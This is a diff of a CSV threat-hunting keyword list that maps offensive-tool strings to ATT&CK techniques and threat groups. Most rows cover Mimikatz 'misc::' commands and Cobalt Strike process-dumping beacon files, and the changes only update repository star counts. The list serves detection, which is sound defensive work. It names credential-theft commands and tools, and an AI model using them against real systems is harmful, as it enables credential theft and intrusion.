@@ -13611,52 +13769,52 @@ "*minidumpwritedump*","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rookuu/BOFs","1","1","N/A","10","10","156","26","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z" "*MiniDumpWriteDump*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","1","N/A","10","10","218","25","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z" "*mirrors.aliyun.com/parrot*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*misc::aadcookie*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*misc::clip*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*misc::cmd*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*misc::compress*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*misc::detours*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*misc::efs*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*misc::lock*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*misc::memssp*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*misc::mflt*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*misc::ncroutemon*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*misc::ngcsign*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*misc::printnightmare*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*misc::regedit*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*misc::sccm*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*misc::shadowcopies*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*misc::skeleton*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*misc::spooler*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*misc::taskmgr*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*misc::wp*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*misc::xor*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*miscbackdoorlnkhelp*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - 
T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","448","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" -"*missile-command.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*misc::aadcookie*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::clip*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::cmd*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::compress*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::detours*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::efs*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::lock*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::memssp*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::mflt*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*misc::ncroutemon*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - 